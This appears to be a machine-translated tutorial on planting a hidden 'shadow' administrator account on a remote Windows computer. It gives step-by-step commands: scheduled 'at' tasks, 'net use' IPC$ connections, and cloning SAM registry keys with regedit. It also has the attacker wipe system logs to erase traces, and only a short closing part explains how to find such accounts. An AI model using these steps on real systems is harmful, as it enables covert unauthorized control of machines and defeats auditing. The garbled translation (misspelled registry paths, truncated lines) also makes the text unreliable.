Steps:
1. There are many ways to obtain the highest permissions (administrator privilege) of the remote computer administrator privilege. The difficulty depends on the level of defense of the other computer. How to obtain permissions is not described.
2. use various tools to enable the Remote Registry and scheduled Task Service. Server service functions of the remote computer.
3. Compile the "add Administrator Account" DOS commandProgram, That is, the com or bat program. The program should contain the automatic closing and self-clearing functions of the running window to clear the marks (commonly known as "Bass '). And upload these files to the other party's computer (hidden in a difficult corner ).
4. In order to remotely run these doscommands on the other computer, the task timing plan for the remote computer (system-level running) is now created. In the local DOS environment, enter the following command: at \ xx. XX. XX. XX time \ xx. XX. XX. file Path of XX \ dos program
5. Run the following command to test whether the remote account is successfully added: net use \ xx. XX. XX. XX \ IPC $ "password"/User: "Account Name". If the remote connection is successful. The account is added!
6. log out of the connected add account: net use \ xx. xx \ IPC $/del
7. Run the regedt32.exe program on the Local Computer, connect to the remote computer xx. xx, and set the administrator privilege of the remote computer on the Sam registry to full control. Exit the regedt32 program. Open the regedit.exe program and connect to the remote computer registry. Copy the f key of an existing Administrator account to the f key of the added administrator account.
8. Export the key value of the new Administrator account on the registry on the remote computer. The following command can be used: At \ xx. XX. XX. XX time \ xx. XX. XX. XX \ ADMIN $ \ regedit.exe/e registry name. registry path to be exported by Reg
9. Create and delete the DOS command program for the newly added Administrator Account and run it on a remote computer at regular intervals. Test to ensure that the account is successfully deleted.
10. Import the exported registry at \ XX on a remote computer. XX. XX. XX time \ xx. XX. XX. XX \ ADMIN $ \ regedit.exe/s registry name. reg (/s, silent import)
11. Change the Sam permission on the Remote Registry to only retain the system-level Account Modification permission ,. That is, restore the original permission.
12. Use the MT program to delete system records from a remote computer. Erase all the tails that reveal your traces. Remember to clean your work.
13. Remotely connect to the computer and log on with the created shadow account. The test is successful and you can check that no account is displayed in the account on the remote computer!
The Shadow account is equivalent to an administrator account with the same password as administrator. When the administrator password changes, the shadow account password remains the same, and the Administrator account password changes when the account password changes. The shadow account cannot be seen in conventional methods,
You can only go to the Registry.
Follow these steps to create a shadow account:
Locate "hkey_machne \ SAM \ Domains \ ACCOUNT \ User \ names \ Administrator" and remember it)
Save and double-click to import the registry.
XXX is any name
How to find the shadow account: "open the registry and find" hkey_machne \ SAM \ Domains \ ACCOUNT \ User \ names \ Administrator "to view the default value.
2 "hkey_machne \ SAM \ Domains \ ACCOUNT \ User \ names" is the shadow account as long as it has the same value as above.
(Sometimes the shadow account may not be administrator or a normal account.